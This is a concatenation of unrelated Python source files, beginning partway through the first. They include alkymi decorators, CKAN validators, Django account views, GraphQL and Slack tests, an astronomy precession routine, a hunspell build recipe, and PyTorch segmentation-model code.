def _decorator(func: Callable[..., R]) -> Recipe[R]:
"""
Closure to capture arguments from decorator
:param func: The bound function to wrap in a Recipe
:return: The created Recipe
"""
return Recipe(func, ingredients, func.__name__, transient, cache)
return _decorator
def foreach(mapped_inputs: Recipe, ingredients: Iterable[Recipe] = (), transient: bool = False,
cache: CacheType = CacheType.Auto) -> \
Callable[[Callable[..., R]], ForeachRecipe[R]]:
"""
Convert a function into an alkymi Recipe to enable caching and conditional evaluation
:param mapped_inputs: A single Recipe to whose output (a list or dictionary) the bound function will be applied to
generate the new outputs (similar to Python's built-in map() function)
:param ingredients: The dependencies of this Recipe - the outputs of these Recipes will be provided as arguments to
the bound function when called (following the item from the mapped_inputs sequence)
:param transient: Whether to always (re)evaluate the created Recipe
:param cache: The type of caching to use for this Recipe
:return: A callable that will yield the Recipe created from the bound function
"""
def _decorator(func: Callable[..., R]) -> ForeachRecipe[R]:
"""
Closure to capture arguments from decorator
:param func: The bound function to wrap in a ForeachRecipe
:return: The created ForeachRecipe
"""
return ForeachRecipe(mapped_inputs, ingredients, func, func.__name__, transient, cache)
return _decorator
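# A minimal usage sketch (the functions below are hypothetical and only illustrate how
# the two decorators compose):
#
#   @recipe()
#   def numbers() -> list:
#       return [1, 2, 3]
#
#   @foreach(numbers)
#   def squared(value: int) -> int:
#       return value * value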
|
457848
|
import supriya.realtime
def test_01(server):
control_bus = supriya.realtime.Bus.control()
control_bus.allocate()
assert control_bus.is_allocated
result = control_bus.get()
assert result == 0.0
assert control_bus.value == result
control_bus.set(0.5)
result = control_bus.get()
assert result == 0.5
assert control_bus.value == result
control_bus.set(0.25)
result = control_bus.get()
assert result == 0.25
assert control_bus.value == result
|
457891
|
from __future__ import absolute_import, division, print_function
# svn co https://cbflib.svn.sourceforge.net/svnroot/cbflib/trunk/CBFlib_bleeding_edge sourceforge_cbflib
class info_counters(object):
def __init__(O):
O.mkdir = 0
O.copied = 0
O.updated = 0
O.already_up_to_date = 0
def report(O):
print("Directories created:", O.mkdir)
print("Files copied:", O.copied)
print("Files updated:", O.updated)
print("Files already up-to-date:", O.already_up_to_date)
def run(args):
assert len(args) == 1, "<path>/sourceforge_cbflib"
sourceforge_cbflib = args[0]
from shutil import copyfile
import os
op = os.path
assert op.isdir(sourceforge_cbflib)
counters = info_counters()
def copy_from_directory(dname, fnames=None, h_c_only=False):
if (not op.isdir(dname)):
os.mkdir(dname)
counters.mkdir += 1
dpath = op.join(sourceforge_cbflib, dname)
if (fnames is None): fnames = os.listdir(dpath)
for fname in fnames:
if (not h_c_only or fname.endswith(".h") or fname.endswith(".c")):
src = op.join(dpath, fname)
dst = op.join(dname, fname)
src_bytes = open(src, "rb").read()
if (not op.isfile(dst)):
counters.copied += 1
else:
dst_bytes = open(dst, "rb").read()
if (dst_bytes == src_bytes):
counters.already_up_to_date += 1
src = None
else:
counters.updated += 1
if (src is not None):
copyfile(src=src, dst=dst)
for dname in ["include", "src"]:
copy_from_directory(dname, h_c_only=True)
copy_from_directory("src", ["cbf.stx.y"])
copy_from_directory("pycbf", ["pycbf_wrap.c", "pycbf.py"])
copy_from_directory("examples", ["img.h", "img.c", "fit2d_data.cbf"])
copy_from_directory("doc", ["lgpl.txt"])
fnames = ["README"]
if (op.isfile(op.join(sourceforge_cbflib, "TAG"))):
fnames.append("TAG")
copy_from_directory(".", fnames)
counters.report()
print("Done.")
if (__name__ == "__main__"):
import sys
run(args=sys.argv[1:])
|
457895
|
from __future__ import absolute_import
from past.builtins import basestring
import re
from ckan.common import _
import ckan.lib.navl.dictization_functions as df
from ckanext.fluent.validators import fluent_text
from ckan.common import config
import ckan.plugins.toolkit as toolkit
import ckan.logic.validators as validators
import json
from . import plugin
missing = toolkit.missing
get_action = toolkit.get_action
try:
from ckanext.scheming.validation import (
scheming_validator, validators_from_string)
except ImportError:
# If scheming can't be imported, return a normal validator instead
# of the scheming validator
def scheming_validator(fn):
def noop(key, data, errors, context):
return fn(None, None)(key, data, errors, context)
return noop
validators_from_string = None
def lower_if_exists(s):
return s.lower() if s else s
def upper_if_exists(s):
return s.upper() if s else s
def get(field, obj):
return obj[field] if type(obj) is dict else obj.__getattribute__(field)
def valid_resources(private, context):
package = context.get('package')
if not package:
return private
change = get('private', package) != private
to_public = private is False or private == u'False'
if change and to_public:
for resource in get('resources', package):
if get('extras', resource).get('valid_content') == 'no':
raise df.Invalid(_("Package contains invalid resources"))
return private
@scheming_validator
def only_default_lang_required(field, schema):
default_lang = ''
if field and field.get('only_default_lang_required'):
default_lang = config.get('ckan.locale_default', 'en')
def validator(key, data, errors, context):
if errors[key]:
return
value = data[key]
if value is not missing:
if isinstance(value, basestring):
try:
value = json.loads(value)
except ValueError:
errors[key].append(_('Failed to decode JSON string'))
return
except UnicodeDecodeError:
errors[key].append(_('Invalid encoding for JSON string'))
return
if not isinstance(value, dict):
errors[key].append(_('expecting JSON object'))
return
if value.get(default_lang) is None:
errors[key].append(_('Required language "%s" missing') % default_lang)
return
prefix = key[-1] + '-'
extras = data.get(key[:-1] + ('__extras',), {})
if extras.get(prefix + default_lang) == '':
errors[key[:-1] + (key[-1] + '-' + default_lang,)] = [_('Missing value')]
return validator
@scheming_validator
def keep_old_value_if_missing(field, schema):
from ckan.lib.navl.dictization_functions import missing, flatten_dict
def validator(key, data, errors, context):
if 'package' not in context:
return
data_dict = flatten_dict(get_action('package_show')(context, {'id': context['package'].id}))
if key not in data or data[key] is missing:
if key in data_dict:
data[key] = data_dict[key]
return validator
def default_value(default):
from ckan.lib.navl.dictization_functions import missing
def converter(value, context):
return value if value is not missing else default
return converter
def business_id_validator(value):
matches = re.match(r"(^[0-9]{6,7})-([0-9])$", value)
if not matches:
raise toolkit.Invalid(_("Business id is incorrect format."))
business_id = matches.group(1)
if len(business_id) == 6:
business_id = "0" + business_id
verification_number = (7 * int(business_id[0]) +
9 * int(business_id[1]) +
10 * int(business_id[2]) +
5 * int(business_id[3]) +
8 * int(business_id[4]) +
4 * int(business_id[5]) +
2 * int(business_id[6])) % 11
if verification_number > 1:
verification_number = 11 - verification_number
if verification_number != int(matches.group(2)):
raise toolkit.Invalid(_("Business id verification number does match business id."))
return value
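# Worked example (hypothetical id, not a real company): for "0737546-2" the
# weighted sum is 7*0 + 9*7 + 10*3 + 5*7 + 8*5 + 4*4 + 2*6 = 196, 196 % 11 = 9,
# and 11 - 9 = 2 matches the check digit, so the value passes the validator.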
@scheming_validator
def mark_as_modified_in_catalog_if_changed(field, schema):
from ckan.logic import get_action
def validator(key, data, errors, context):
if context.get('group'):
# Auth audit will fail during harvester updates
context.pop('__auth_audit', None)
old_organization = get_action('organization_show')(context, {'id': context['group'].id})
if json.dumps(old_organization.get(key[0])) != data[key] and 'for_edit' in context:
flattened = df.flatten_dict({key[0] + '_modified_in_catalog': True})
data.update(flattened)
return validator
def ignore_not_package_maintainer(key, data, errors, context):
'''Ignore the field if user not sysadmin or ignore_auth in context.'''
if 'package' not in context:
return
    try:
        toolkit.check_access('package_update', context, {'id': context['package'].id})
    except toolkit.NotAuthorized:
        # non-maintainers may not set this field; silently drop it
        data.pop(key)
def create_fluent_tags(vocab):
def callable(key, data, errors, context):
value = data[key]
if isinstance(value, str):
value = json.loads(value)
if isinstance(value, dict):
for lang in value:
add_to_vocab(context, value[lang], vocab + '_' + lang)
data[key] = json.dumps(value)
return callable
def add_to_vocab(context, tags, vocab):
defer = context.get('defer', False)
try:
v = get_action('vocabulary_show')(context, {'id': vocab})
except toolkit.ObjectNotFound:
v = plugin.create_vocabulary(vocab, defer)
import ckan.model as model
context['vocabulary'] = model.Vocabulary.get(v.get('id'))
if isinstance(tags, basestring):
tags = [tags]
for tag in tags:
validators.tag_length_validator(tag, context)
validators.tag_name_validator(tag, context)
try:
validators.tag_in_vocabulary_validator(tag, context)
except toolkit.Invalid:
plugin.create_tag_to_vocabulary(tag, vocab, defer)
def convert_to_json_compatible_str_if_str(value):
if isinstance(value, basestring):
if value == "":
return json.dumps({})
try:
json.loads(value)
except ValueError:
value = json.dumps({'fi': value})
return value
def override_field_with_default_translation(overridden_field_name):
@scheming_validator
def implementation(field, schema):
from ckan.lib.navl.dictization_functions import missing
default_lang = config.get('ckan.locale_default', 'en')
def validator(key, data, errors, context):
value = data[key]
override_value = missing
if value is not missing:
if isinstance(value, basestring):
try:
value = json.loads(value)
except ValueError:
errors[key].append(_('Failed to decode JSON string'))
return
except UnicodeDecodeError:
errors[key].append(_('Invalid encoding for JSON string'))
return
if not isinstance(value, dict):
errors[key].append(_('expecting JSON object'))
return
override_value = value.get(default_lang, missing)
if override_value not in (None, missing):
overridden_key = tuple(overridden_field_name.split('.'))
data[overridden_key] = override_value
return validator
return implementation
@scheming_validator
def fluent_list(field, schema):
fluent_text_validator = fluent_text(field, schema)
def validator(key, data, errors, context):
value = None
if data.get(key):
value = data[key]
if not isinstance(value, dict):
try:
value = json.loads(value)
except ValueError:
value = None
if not value:
fluent_text_validator(key, data, errors, context)
if errors[key]:
return
json_value = data[key]
if json_value is missing:
return
value = json.loads(json_value)
result = {lang: lang_value if isinstance(lang_value, list) else [item.strip() for item in lang_value.split(',')]
for lang, lang_value in list(value.items())}
data[key] = json.dumps(result)
return validator
def fluent_list_output(value):
"""
Return stored json representation as a multilingual dict, if
value is already a dict just pass it through.
"""
if isinstance(value, dict):
return value
try:
result = json.loads(value)
return {k: v if isinstance(v, list) else [v] for k, v in list(result.items())}
except ValueError:
# plain string in the db, return as is so it can be migrated
return value
|
457919
|
import json
import pytest
from graphene.test import Client
from main.schema import schema
@pytest.mark.django_db
def test_municipalities_exists():
client = Client(schema)
result = client.execute('''
query {
municipalities {
edges {
node {
id
name
bfsNumber
}
}
}
}''', context={})
    result = json.loads(json.dumps(result))  # normalize away OrderedDicts (plain dicts are ordered in Python 3.7+)
assert result == {
"data": {
"municipalities": {
"edges": [
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTo2MjUy",
"name": "Anniviers",
"bfsNumber": 6252
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTo2MDMx",
"name": "Bagnes",
"bfsNumber": 6031
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTozNzky",
"name": "Bregaglia",
"bfsNumber": 3792
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTozODUx",
"name": "Davos",
"bfsNumber": 3851
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZToxNjMx",
"name": "<NAME>",
"bfsNumber": 1631
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTo3ODQ=",
"name": "Innertkirchen",
"bfsNumber": 784
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTozNzYy",
"name": "Scuol",
"bfsNumber": 3762
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTozNTQz",
"name": "Surses",
"bfsNumber": 3543
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTo2MzAw",
"name": "Zermatt",
"bfsNumber": 6300
}
},
{
"node": {
"id": "TXVuaWNpcGFsaXR5Tm9kZTozNzQ2",
"name": "Zernez",
"bfsNumber": 3746
}
}
]
}
}
}
@pytest.mark.django_db
def test_snapshots_exists():
client = Client(schema)
result = client.execute('''
query {
snapshots(isShowcase: true) {
edges {
node {
id
pk
title
topic
screenshot
}
}
}
}''', context={})
    result = json.loads(
        json.dumps(result))  # normalize away OrderedDicts (plain dicts are ordered in Python 3.7+)
assert result == {
'data': {
'snapshots': {
'edges': [{
'node': {
'id': 'U25hcHNob3ROb2RlOlI0UlBHQw==',
'pk': 'R4RPGC',
'title': 'test snapshot',
'topic': 'test topic',
'screenshot': None
}
}]
}
}
}
|
457955
|
import logging
import re
import secrets
import django
from django.contrib.auth import authenticate
from django.core.mail import send_mail
from django.http import HttpResponse
from django.shortcuts import render, redirect
from app.views import validate_user_email
from .models import CustomUser
def get_logger():
logger = logging.getLogger('views_account')
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
return logger
log = get_logger()
username_pattern = re.compile('^[a-zA-Z0-9_.]+$')
def check_login(request):
if request.method == 'POST':
body = request.POST
username = body['username'].lower()
password = body['password']
next_url = body['next']
user = None
if validate_user_email(username):
user_set = CustomUser.objects.filter(email=username)
if len(user_set) == 1:
user = authenticate(username=user_set[0].username, password=password)
else:
user = authenticate(username=username, password=password)
if user is None:
log.info(f'{username} cannot be authenticated')
return render(request, 'registration/login.html',
context={'username': username,
'password': password,
'error_login': 'Invalid credentials',
'next': next_url})
else:
log.info(f'{username} has just logged in')
django.contrib.auth.login(request, user)
if next_url:
return redirect(next_url)
else:
return redirect('index')
def check_regex(pattern, to_check):
if pattern.match(to_check):
return True
else:
return False
def check_existing_email(email):
user_set = CustomUser.objects.filter(email=email, is_active=True)
if len(user_set) > 0:
return True
else:
return False
def send_confirmation_email(user):
confirmation_email_text = f"""Hi {user.username},\n\nHere is the link to activate your DataTau account:\n\nhttps://datatau.net/accounts/login/activate/{user.id}/{user.api_key}\n\nWelcome to the coolest Data Science community!\n\nBR,\n\nDavid & Pedro"""
send_mail(
subject=f'Confirmation email from datatau.net',
message=confirmation_email_text,
from_email='<EMAIL>',
recipient_list=[user.email],
fail_silently=False
)
def check_signup(request):
if request.method == 'POST':
body = request.POST
username = body['username'].strip()
        password = body['password'].strip()
email = body['email'].strip()
next_url = body['next']
if CustomUser.objects.filter(username=username):
log.info(f'username {username} already exists')
return render(request, 'registration/login.html',
context={'error_signup': 'User already exists',
'next': next_url})
elif not check_regex(username_pattern, username):
log.info(f'wrong username: {username}')
return render(request, 'registration/login.html',
context={
'error_signup': 'username can only contain alphanumeric characters along with . or _',
'next': next_url})
elif not password:
log.info('empty password')
return render(request, 'registration/login.html',
context={'error_signup': 'empty password',
'next': next_url})
elif not validate_user_email(email):
log.info(f'not valid email: {email}')
return render(request, 'registration/login.html',
context={'error_signup': f'not valid email: {email}',
'next': next_url})
elif check_existing_email(email):
log.info(f'email {email} already exists')
return render(request, 'registration/login.html',
context={'error_signup': f'email {email} already exists for an user, please try to login',
'next': next_url})
else:
user = CustomUser(username=username, email=email)
user.set_password(password)
user.api_key = secrets.token_urlsafe(15)
user.is_active = False
user.save()
            log.info(f'{username} has just signed up, sending confirmation email...')
send_confirmation_email(user)
return HttpResponse(
"<h1>Congrats!</h1><p>You're just one step away to join the DataTau community.</p><p>We've just sent you a confirmation email. Please check your inbox and click on the confirmation link :)</p>")
def activation(request, user_id, api_key):
if request.method == 'GET':
user_set = CustomUser.objects.filter(id=user_id)
if len(user_set) == 1 and user_set[0].api_key == api_key:
log.info(f'activating user {user_id}...')
user = user_set[0]
user.is_active = True
user.save()
django.contrib.auth.login(request, user)
else:
log.info(f'unable to activate user {user_id}')
return redirect('index')
|
457957
|
from __future__ import division, print_function
import numpy as np
import plyades.util as util
def precession(date):
''' Vallado 2nd Edition p.215
'''
# Julian centuries since the epoch
t = (date - 2451545)/36525
zeta = util.dms2rad(0, 0, 2306.2181*t + 0.30188*t**2 + 0.017998*t**3)
theta = util.dms2rad(0, 0, 2004.3109*t - 0.42665*t**2 - 0.041833*t**3)
z = util.dms2rad(0, 0, 2306.2181*t + 1.09468*t**2 + 0.018203*t**3)
# Determine rotational matrices.
M1 = util.rot(-z, axis=3)
M2 = util.rot(theta, axis=2)
M3 = util.rot(-zeta, axis=3)
return np.dot(M1, np.dot(M2, M3))
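# A minimal usage sketch (hypothetical vector): rotate a mean-of-J2000 position
# into the mean-of-date frame; the Julian date below falls in early 2010.
if __name__ == '__main__':
    r_j2000 = np.array([7000.0, 0.0, 0.0])  # km
    print(np.dot(precession(2455198.0), r_j2000))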
# from scipy import optimize
#
# pvecle = aux.pvecle
# pelvec = aux.pelvec
#
#
# def eci2ecef(s, theta, omega):
# M = np.zeros((6, 6))
# M[0, 0] = np.cos(theta)
# M[0, 1] = np.sin(theta)
# M[1, 0] = -np.sin(theta)
# M[1, 1] = np.cos(theta)
# M[2, 2] = 1
# M[3, 0] = -omega * np.sin(theta)
# M[3, 1] = omega * np.cos(theta)
# M[4, 0] = -omega * np.cos(theta)
# M[4, 1] = -omega * np.sin(theta)
# M[3, 3] = M[0, 0]
# M[3, 4] = M[0, 1]
# M[4, 3] = M[1, 0]
# M[4, 4] = M[1, 1]
# M[5, 5] = M[2, 2]
#
# st = np.dot(M, s)
# return st, M
#
# def ecef2eci(s, theta, omega):
# M = np.zeros((3, 3))
# N = np.zeros((3, 3))
# st = np.zeros(6)
# M[0, 0] = np.cos(theta)
# M[0, 1] = np.sin(theta)
# M[1, 0] = -np.sin(theta)
# M[1, 1] = np.cos(theta)
# M[2, 2] = 1
# N[0, 0] = -omega * np.sin(theta)
# N[0, 1] = omega * np.cos(theta)
# N[1, 0] = -omega * np.cos(theta)
# N[1, 1] = -omega * np.sin(theta)
#
# st[0:3] = np.dot(M.T, s[0:3])
# st[3:6] = np.dot(M.T, s[3:6]) + np.dot(N.T, s[0:3])
# return st, M.T
#
#
#
# def lla2ecef(lat, lon, alt):
# e = np.sqrt(2 * earth.f - earth.f ** 2)
# c = earth.r_e / np.sqrt(1 - e ** 2 * np.sin(lat) ** 2)
# s = c * (1 - e ** 2)
# r_delta = (c + alt) * np.cos(lat)
# r_k = (s + alt) * np.sin(lat)
# return np.array([r_delta * np.cos(lon), r_delta * np.sin(lon), r_k])
#
#
# def ecef2lla(s, tol=1e-10):
# x, y, z = s[0:3]
# r = np.sqrt(x ** 2 + y ** 2 + z ** 2)
# r_delta = np.sqrt(x ** 2 + y ** 2)
# lon = np.arctan2(y, x)
#
# if abs(lon) >= np.pi:
# if lon < 0:
# lon = 2 * np.pi + lon
# else:
# lon = lon - 2 * np.pi
#
# delta = np.arcsin(z / r)
#
# def latitude(lat):
# e = np.sqrt(2 * earth.f - earth.f ** 2)
# c = earth.r_e / np.sqrt(1 - e ** 2 * np.sin(lat) ** 2)
# return (z + c * e ** 2 * np.sin(lat)) / r_delta - np.tan(lat)
#
# lat = optimize.newton(latitude, delta, tol=tol)
#
# e = np.sqrt(2 * earth.f - earth.f ** 2)
# c = earth.r_e / np.sqrt(1 - e ** 2 * np.sin(lat) ** 2)
# alt = r_delta / np.cos(lat) - c
#
# return np.array([lat, lon, alt])
#
#
# def ecef2sez(s, site=None, lat=None, lon=None, alt=None):
# if not site == None:
# ecef = site
# lat, lon, alt = ecef2lla(ecef)
# elif not lat == None or lon == None or alt == None:
# ecef = lla2ecef(lat, lon, alt)
# else:
# raise SyntaxError("""Site location must be specified in
# either ECEF format or lat/lon/alt!""")
#
# rho_ecef = s[0:3] - ecef
# rhod_ecef = s[3:6]
#
# M = np.zeros((6, 6))
# M[0, 0] = np.sin(lat) * np.cos(lon)
# M[0, 1] = np.sin(lat) * np.sin(lon)
# M[0, 2] = -np.cos(lat)
# M[1, 0] = -np.sin(lon)
# M[1, 1] = np.cos(lon)
# M[2, 0] = np.cos(lat) * np.cos(lon)
# M[2, 1] = np.cos(lat) * np.sin(lon)
# M[2, 2] = np.sin(lat)
# M[3:6, 3:6] = M[0:3, 0:3]
#
# return np.dot(M, np.append(rho_ecef, rhod_ecef)), M
#
#
# def sez2razel(s):
# ran = np.sqrt(np.dot(s[0:3], s[0:3]))
# rrt = np.dot(s[0:3], s[3:6]) / ran
# el = np.arcsin(s[2] / ran)
# az = np.arctan2(s[1], -s[0])
#
# return ran, rrt, az, el
#
|
457987
|
from ..factory import Type
class callStateReady(Type):
protocol = None # type: "callProtocol"
connections = None # type: "vector<callConnection>"
config = None # type: "string"
encryption_key = None # type: "bytes"
emojis = None # type: "vector<string>"
allow_p2p = None # type: "Bool"
|
458025
|
from __future__ import absolute_import
import time
from flexmock import flexmock
import pony.tasks
from tests.test_base import BaseTest
class SendMessageTest(BaseTest):
def test_execute(self):
task = pony.tasks.SendMessage('_to', '_text', [1, 2, 3])
(flexmock(self.bot.slack_client.server)
.should_receive('send_to_websocket')
.with_args(dict(type='typing', channel='_to')))
        # sending the 'typing' event imitates human typing by waiting up to 2 seconds
(flexmock(time)
.should_receive('sleep')
.times(2))
(flexmock(self.slack)
.should_receive('api_call')
.with_args(
'chat.postMessage',
channel='_to',
text='_text',
attachments=[1, 2, 3],
as_user=True
))
task.execute(self.bot, self.slack)
|
458092
|
import info
class subinfo(info.infoclass):
def setTargets( self ):
self.svnTargets[ "master"] = f"https://github.com/hunspell/hunspell.git"
for ver in ["1.6.2"]:
            self.targets[ver] = f"https://github.com/hunspell/hunspell/archive/v{ver}.tar.gz"
self.archiveNames[ver] = f"hunspell-v{ver}.tar.gz"
self.targetInstSrc[ver] = f"hunspell-{ver}"
self.targetDigests["1.6.2"] = (['3cd9ceb062fe5814f668e4f22b2fa6e3ba0b339b921739541ce180cac4d6f4c4'], CraftHash.HashAlgorithm.SHA256)
self.description = "Hunspell is the spell checker of LibreOffice, OpenOffice.org, Mozilla Firefox 3 & Thunderbird, Google Chrome, and it is also used by proprietary software packages, like macOS, InDesign, memoQ, Opera and SDL Trados."
self.webpage = "http://hunspell.github.io/"
self.defaultTarget = "1.6.2"
def setDependencies( self ):
if CraftCore.compiler.isMinGW():
self.buildDependencies["dev-utils/msys"] = None
self.runtimeDependencies["virtual/base"] = None
self.runtimeDependencies["libs/gettext"] = None
self.runtimeDependencies["libs/iconv"] = None
self.runtimeDependencies["data/hunspell-dictionaries"] = None
from Package.MSBuildPackageBase import *
class PackageMSVC(MSBuildPackageBase):
def __init__(self, **args):
MSBuildPackageBase.__init__(self)
self.subinfo.options.configure.projectFile = os.path.join(self.sourceDir(), "msvc", "Hunspell.sln")
self.buildTypes = {"Release" : "Release_dll", "RelWithDebInfo" : "Release_dll", "Debug" : "Debug_dll" }
def compile(self):
utils.copyFile(os.path.join(self.sourceDir(), "msvc", "config.h"), os.path.join(self.sourceDir(), "config.h"))
out = super().compile()
utils.deleteFile(os.path.join(self.sourceDir(), "config.h"))
return out
def install(self):
if not MSBuildPackageBase.install(self, installHeaders=False):
return False
for h in ["atypes.hxx", "hunspell.h", "hunspell.hxx", "hunvisapi.h", "w_char.hxx"]:
utils.copyFile(os.path.join(self.sourceDir(), "src", "hunspell", h), os.path.join(self.imageDir(), "include", "hunspell", h))
return True
from Package.AutoToolsPackageBase import *
class PackageGNU(AutoToolsPackageBase):
def __init__(self, **args):
AutoToolsPackageBase.__init__(self)
self.subinfo.options.configure.bootstrap = True
self.subinfo.options.configure.args += " --disable-static --enable-shared"
if CraftCore.compiler.isGCCLike():
class Package(PackageGNU):
pass
else:
class Package(PackageMSVC):
pass
|
458107
|
import pickle
import torch
import math
import time
def to_cuda(x):
use_gpu = torch.cuda.is_available()
if use_gpu:
x = x.cuda()
return x
def time_since(since):
now = time.time()
s = now - since
m = math.floor(s / 60)
s -= m * 60
return '%dm %ds' % (m, s)
def save_checkpoint(model, optimizer, filepath):
state = {
'state_dict': model.state_dict(),
'optimizer': optimizer.state_dict(),
}
torch.save(state, filepath)
def load_checkpoint(model, optimizer, filepath):
# "lambda" allows to load the model on cpu in case it is saved on gpu
state = torch.load(filepath, lambda storage, loc: storage)
model.load_state_dict(state['state_dict'])
optimizer.load_state_dict(state['optimizer'])
return model, optimizer
def save_model(model, filepath):
# Update the saved model file
torch.save(model.state_dict(), filepath)
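# A minimal round-trip sketch (hypothetical model, optimizer and file name):
# save a checkpoint and restore it with the helpers above.
if __name__ == '__main__':
    import torch.nn as nn
    net = to_cuda(nn.Linear(4, 2))
    opt = torch.optim.SGD(net.parameters(), lr=0.01)
    save_checkpoint(net, opt, 'checkpoint.pth')
    net, opt = load_checkpoint(net, opt, 'checkpoint.pth')
    print('restored parameters:', sum(p.numel() for p in net.parameters()))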
|
458114
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from .fusion import AsymBiChaFuseReduce, BiLocalChaFuseReduce, BiGlobalChaFuseReduce
class ResidualBlock(nn.Module):
def __init__(self, in_channels, out_channels, stride, downsample):
super(ResidualBlock, self).__init__()
self.body = nn.Sequential(
nn.Conv2d(in_channels, out_channels, 3, stride, 1, bias=False),
nn.BatchNorm2d(out_channels),
nn.ReLU(True),
nn.Conv2d(out_channels, out_channels, 3, 1, 1, bias=False),
nn.BatchNorm2d(out_channels),
)
if downsample:
self.downsample = nn.Sequential(
nn.Conv2d(in_channels, out_channels, 1, stride, 0, bias=False),
nn.BatchNorm2d(out_channels),
)
else:
self.downsample = nn.Sequential()
def forward(self, x):
residual = x
x = self.body(x)
if self.downsample:
residual = self.downsample(residual)
out = F.relu(x+residual, True)
return out
class _FCNHead(nn.Module):
def __init__(self, in_channels, out_channels):
super(_FCNHead, self).__init__()
inter_channels = in_channels // 4
self.block = nn.Sequential(
nn.Conv2d(in_channels, inter_channels, 3, 1, 1, bias=False),
nn.BatchNorm2d(inter_channels),
nn.ReLU(True),
nn.Dropout(0.1),
nn.Conv2d(inter_channels, out_channels, 1, 1, 0)
)
def forward(self, x):
return self.block(x)
class ASKCResNetFPN(nn.Module):
def __init__(self, layer_blocks, channels, fuse_mode='AsymBi'):
super(ASKCResNetFPN, self).__init__()
stem_width = channels[0]
self.stem = nn.Sequential(
nn.BatchNorm2d(3),
nn.Conv2d(3, stem_width, 3, 2, 1, bias=False),
nn.BatchNorm2d(stem_width),
nn.ReLU(True),
nn.Conv2d(stem_width, stem_width, 3, 1, 1, bias=False),
nn.BatchNorm2d(stem_width),
nn.ReLU(True),
nn.Conv2d(stem_width, stem_width*2, 3, 1, 1, bias=False),
nn.BatchNorm2d(stem_width*2),
nn.ReLU(True),
nn.MaxPool2d(3, 2, 1)
)
self.layer1 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[0],
in_channels=channels[1], out_channels=channels[1], stride=1)
self.layer2 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[1],
in_channels=channels[1], out_channels=channels[2], stride=2)
self.layer3 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[2],
in_channels=channels[2], out_channels=channels[3], stride=2)
self.fuse23 = self._fuse_layer(channels[3], channels[2], channels[2], fuse_mode)
self.fuse12 = self._fuse_layer(channels[2], channels[1], channels[1], fuse_mode)
self.head = _FCNHead(channels[1], 1)
def forward(self, x):
_, _, hei, wid = x.shape
x = self.stem(x)
c1 = self.layer1(x)
c2 = self.layer2(c1)
out = self.layer3(c2)
out = F.interpolate(out, size=[hei//8, wid//8], mode='bilinear')
out = self.fuse23(out, c2)
out = F.interpolate(out, size=[hei//4, wid//4], mode='bilinear')
out = self.fuse12(out, c1)
pred = self.head(out)
out = F.interpolate(pred, size=[hei, wid], mode='bilinear')
return out
def _make_layer(self, block, block_num, in_channels, out_channels, stride):
downsample = (in_channels != out_channels) or (stride != 1)
layer = []
layer.append(block(in_channels, out_channels, stride, downsample))
for _ in range(block_num-1):
layer.append(block(out_channels, out_channels, 1, False))
return nn.Sequential(*layer)
def _fuse_layer(self, in_high_channels, in_low_channels, out_channels, fuse_mode='AsymBi'):
assert fuse_mode in ['BiLocal', 'AsymBi', 'BiGlobal']
if fuse_mode == 'BiLocal':
fuse_layer = BiLocalChaFuseReduce(in_high_channels, in_low_channels, out_channels)
elif fuse_mode == 'AsymBi':
fuse_layer = AsymBiChaFuseReduce(in_high_channels, in_low_channels, out_channels)
elif fuse_mode == 'BiGlobal':
fuse_layer = BiGlobalChaFuseReduce(in_high_channels, in_low_channels, out_channels)
else:
            raise NameError("Unknown fuse_mode: " + fuse_mode)
return fuse_layer
class ASKCResUNet(nn.Module):
def __init__(self, layer_blocks, channels, fuse_mode='AsymBi'):
super(ASKCResUNet, self).__init__()
stem_width = int(channels[0])
self.stem = nn.Sequential(
nn.BatchNorm2d(3),
nn.Conv2d(3, stem_width, 3, 2, 1, bias=False),
nn.BatchNorm2d(stem_width),
nn.ReLU(True),
nn.Conv2d(stem_width, stem_width, 3, 1, 1, bias=False),
nn.BatchNorm2d(stem_width),
nn.ReLU(True),
nn.Conv2d(stem_width, 2*stem_width, 3, 1, 1, bias=False),
nn.BatchNorm2d(2*stem_width),
nn.ReLU(True),
nn.MaxPool2d(3, 2, 1),
)
self.layer1 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[0],
in_channels=channels[1], out_channels=channels[1], stride=1)
self.layer2 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[1],
in_channels=channels[1], out_channels=channels[2], stride=2)
self.layer3 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[2],
in_channels=channels[2], out_channels=channels[3], stride=2)
self.deconv2 = nn.ConvTranspose2d(channels[3], channels[2], 4, 2, 1)
self.fuse2 = self._fuse_layer(channels[2], channels[2], channels[2], fuse_mode)
self.uplayer2 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[1],
in_channels=channels[2], out_channels=channels[2], stride=1)
self.deconv1 = nn.ConvTranspose2d(channels[2], channels[1], 4, 2, 1)
self.fuse1 = self._fuse_layer(channels[1], channels[1], channels[1], fuse_mode)
self.uplayer1 = self._make_layer(block=ResidualBlock, block_num=layer_blocks[0],
in_channels=channels[1], out_channels=channels[1], stride=1)
self.head = _FCNHead(channels[1], 1)
def forward(self, x):
_, _, hei, wid = x.shape
x = self.stem(x)
c1 = self.layer1(x)
c2 = self.layer2(c1)
c3 = self.layer3(c2)
deconc2 = self.deconv2(c3)
fusec2 = self.fuse2(deconc2, c2)
upc2 = self.uplayer2(fusec2)
deconc1 = self.deconv1(upc2)
fusec1 = self.fuse1(deconc1, c1)
upc1 = self.uplayer1(fusec1)
pred = self.head(upc1)
out = F.interpolate(pred, size=[hei, wid], mode='bilinear')
return out
